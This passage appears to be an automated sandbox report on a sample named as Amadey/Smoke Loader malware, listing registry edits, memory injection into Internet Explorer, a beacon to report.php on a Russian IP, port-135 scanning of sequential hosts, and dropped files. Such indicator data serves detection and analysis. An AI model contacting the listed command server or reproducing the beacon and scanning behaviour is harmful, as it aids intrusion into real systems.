| Set value (data) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0b4e244dcecdb01 | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3008489981-1977616533-741913813-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR" | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1576 wrote to memory of 2480 | N/A | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | C:\Program Files\Internet Explorer\IEXPLORE.exe |
| PID 1576 wrote to memory of 2480 | N/A | C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe | C:\Program Files\Internet Explorer\IEXPLORE.exe |
| PID 2480 wrote to memory of 1440 | N/A | C:\Program Files\Internet Explorer\IEXPLORE.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2480 wrote to memory of 1440 | N/A | C:\Program Files\Internet Explorer\IEXPLORE.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2480 wrote to memory of 1440 | N/A | C:\Program Files\Internet Explorer\IEXPLORE.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe
"C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe"
C:\Program Files\Internet Explorer\IEXPLORE.exe
"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2480 CREDAT:17410 /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ÔN@
Network
| Country | Destination | Domain | Proto |
| RU | 212.33.237.86:80 | tcp | |
| RU | 212.33.237.86:80 | tcp | |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| US | 150.171.28.10:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 72.106.1.58:135 | tcp | |
| US | 72.106.1.59:135 | tcp | |
| US | 72.106.1.60:135 | tcp | |
| US | 72.106.1.61:135 | tcp | |
| US | 72.106.1.62:135 | tcp | |
| US | 72.106.1.63:135 | tcp | |
| US | 72.106.1.64:135 | tcp | |
| US | 72.106.1.65:135 | tcp | |
| US | 72.106.1.66:135 | tcp | |
| US | 72.106.1.67:135 | tcp | |
| US | 72.106.1.68:135 | tcp | |
| US | 72.106.1.69:135 | tcp | |
| US | 72.106.1.70:135 | tcp | |
| US | 72.106.1.71:135 | tcp | |
| US | 72.106.1.72:135 | tcp | |
| US | 72.106.1.73:135 | tcp | |
| US | 72.106.1.74:135 | tcp | |
| US | 72.106.1.75:135 | tcp | |
| US | 72.106.1.76:135 | tcp | |
| US | 72.106.1.77:135 | tcp | |
| US | 72.106.1.78:135 | tcp | |
| US | 72.106.1.79:135 | tcp | |
| US | 72.106.1.80:135 | tcp | |
| US | 72.106.1.81:135 | tcp | |
| US | 72.106.1.82:135 | tcp | |
| US | 72.106.1.83:135 | tcp | |
| US | 72.106.1.84:135 | tcp | |
| US | 72.106.1.85:135 | tcp | |
| US | 72.106.1.86:135 | tcp | |
| US | 72.106.1.87:135 | tcp | |
| US | 72.106.1.88:135 | tcp | |
| US | 72.106.1.89:135 | tcp | |
| US | 72.106.1.90:135 | tcp | |
| US | 72.106.1.91:135 | tcp | |
| US | 72.106.1.92:135 | tcp | |
| US | 72.106.1.93:135 | tcp | |
| US | 72.106.1.94:135 | tcp | |
| US | 72.106.1.95:135 | tcp | |
| US | 72.106.1.96:135 | tcp | |
| US | 72.106.1.97:135 | tcp | |
| US | 72.106.1.98:135 | tcp | |
| US | 72.106.1.99:135 | tcp | |
| US | 72.106.1.100:135 | tcp | |
| US | 72.106.1.101:135 | tcp | |
| US | 72.106.1.102:135 | tcp | |
| US | 72.106.1.103:135 | tcp | |
| US | 72.106.1.104:135 | tcp | |
| US | 72.106.1.105:135 | tcp | |
| US | 72.106.1.106:135 | tcp | |
| US | 72.106.1.107:135 | tcp | |
| US | 72.106.1.108:135 | tcp | |
| US | 72.106.1.109:135 | tcp | |
| US | 72.106.1.110:135 | tcp | |
| US | 72.106.1.111:135 | tcp | |
| US | 72.106.1.112:135 | tcp | |
| US | 72.106.1.113:135 | tcp | |
| US | 72.106.1.114:135 | tcp | |
| US | 72.106.1.115:135 | tcp | |
| US | 72.106.1.116:135 | tcp | |
| US | 72.106.1.117:135 | tcp | |
| US | 72.106.1.118:135 | tcp | |
| US | 72.106.1.119:135 | tcp | |
| US | 72.106.1.120:135 | tcp | |
| US | 72.106.1.121:135 | tcp | |
| US | 72.106.1.122:135 | tcp | |
| US | 72.106.1.123:135 | tcp | |
| US | 72.106.1.124:135 | tcp | |
| US | 72.106.1.125:135 | tcp | |
| US | 72.106.1.126:135 | tcp | |
| US | 72.106.1.127:135 | tcp | |
| US | 72.106.1.128:135 | tcp | |
| US | 72.106.1.129:135 | tcp | |
| US | 72.106.1.130:135 | tcp | |
| US | 72.106.1.131:135 | tcp | |
| US | 72.106.1.132:135 | tcp | |
| US | 72.106.1.133:135 | tcp | |
| US | 72.106.1.134:135 | tcp | |
| US | 72.106.1.135:135 | tcp | |
| US | 72.106.1.136:135 | tcp | |
| US | 72.106.1.137:135 | tcp | |
| US | 72.106.1.138:135 | tcp | |
| US | 72.106.1.139:135 | tcp | |
| US | 72.106.1.140:135 | tcp | |
| US | 72.106.1.141:135 | tcp | |
| US | 72.106.1.142:135 | tcp | |
| US | 72.106.1.143:135 | tcp | |
| US | 72.106.1.144:135 | tcp | |
| US | 72.106.1.145:135 | tcp | |
| US | 72.106.1.146:135 | tcp | |
| US | 72.106.1.147:135 | tcp | |
| US | 72.106.1.148:135 | tcp | |
| US | 72.106.1.149:135 | tcp | |
| US | 72.106.1.150:135 | tcp | |
| US | 72.106.1.151:135 | tcp | |
| US | 72.106.1.152:135 | tcp | |
| US | 72.106.1.153:135 | tcp | |
| US | 72.106.1.154:135 | tcp | |
| US | 72.106.1.155:135 | tcp | |
| US | 72.106.1.156:135 | tcp | |
| US | 72.106.1.157:135 | tcp | |
| US | 72.106.1.158:135 | tcp | |
| US | 72.106.1.159:135 | tcp | |
| US | 72.106.1.160:135 | tcp | |
| US | 72.106.1.161:135 | tcp | |
| US | 72.106.1.162:135 | tcp | |
| US | 72.106.1.163:135 | tcp | |
| US | 72.106.1.164:135 | tcp | |
| US | 72.106.1.165:135 | tcp | |
| US | 72.106.1.166:135 | tcp | |
| US | 72.106.1.167:135 | tcp | |
| US | 72.106.1.168:135 | tcp | |
| US | 72.106.1.169:135 | tcp | |
| US | 72.106.1.170:135 | tcp | |
| US | 72.106.1.171:135 | tcp | |
| US | 72.106.1.172:135 | tcp | |
| US | 72.106.1.173:135 | tcp | |
| US | 72.106.1.174:135 | tcp | |
| US | 72.106.1.175:135 | tcp | |
| US | 72.106.1.176:135 | tcp | |
| US | 72.106.1.177:135 | tcp | |
| US | 72.106.1.178:135 | tcp | |
| US | 72.106.1.179:135 | tcp | |
| US | 72.106.1.180:135 | tcp | |
| US | 72.106.1.181:135 | tcp | |
| US | 72.106.1.182:135 | tcp | |
| US | 72.106.1.183:135 | tcp | |
| US | 72.106.1.184:135 | tcp | |
| US | 72.106.1.185:135 | tcp | |
| US | 72.106.1.186:135 | tcp | |
| US | 72.106.1.187:135 | tcp | |
| US | 72.106.1.188:135 | tcp | |
| US | 72.106.1.189:135 | tcp | |
| US | 72.106.1.190:135 | tcp | |
| US | 72.106.1.191:135 | tcp | |
| US | 72.106.1.192:135 | tcp | |
| US | 72.106.1.193:135 | tcp | |
| US | 72.106.1.194:135 | tcp | |
| US | 72.106.1.195:135 | tcp | |
| US | 72.106.1.196:135 | tcp | |
| US | 72.106.1.197:135 | tcp | |
| US | 72.106.1.198:135 | tcp | |
| US | 72.106.1.199:135 | tcp | |
| US | 72.106.1.200:135 | tcp | |
| US | 72.106.1.201:135 | tcp | |
| US | 72.106.1.202:135 | tcp | |
| US | 72.106.1.203:135 | tcp | |
| US | 72.106.1.204:135 | tcp | |
| US | 72.106.1.205:135 | tcp | |
| US | 72.106.1.206:135 | tcp | |
| US | 72.106.1.207:135 | tcp | |
| US | 72.106.1.208:135 | tcp | |
| US | 72.106.1.209:135 | tcp | |
| US | 72.106.1.210:135 | tcp | |
| US | 72.106.1.211:135 | tcp | |
| US | 72.106.1.212:135 | tcp | |
| US | 72.106.1.213:135 | tcp | |
| US | 72.106.1.214:135 | tcp | |
| US | 72.106.1.215:135 | tcp | |
| US | 72.106.1.216:135 | tcp | |
| US | 72.106.1.217:135 | tcp | |
| US | 72.106.1.218:135 | tcp | |
| US | 72.106.1.219:135 | tcp | |
| US | 72.106.1.220:135 | tcp | |
| US | 72.106.1.221:135 | tcp | |
| US | 72.106.1.222:135 | tcp | |
| US | 72.106.1.223:135 | tcp | |
| US | 72.106.1.224:135 | tcp | |
| US | 72.106.1.225:135 | tcp | |
| US | 72.106.1.226:135 | tcp | |
| US | 72.106.1.227:135 | tcp | |
| US | 72.106.1.228:135 | tcp | |
| US | 72.106.1.229:135 | tcp | |
| US | 72.106.1.230:135 | tcp | |
| US | 72.106.1.231:135 | tcp | |
| US | 72.106.1.232:135 | tcp |
Files
C:\Program Files\7-Zip\7z.exe
C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
C:\Users\Admin\AppData\Local\Temp\KnoAC0F.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6OFSFIBH\suggestions[1].en-US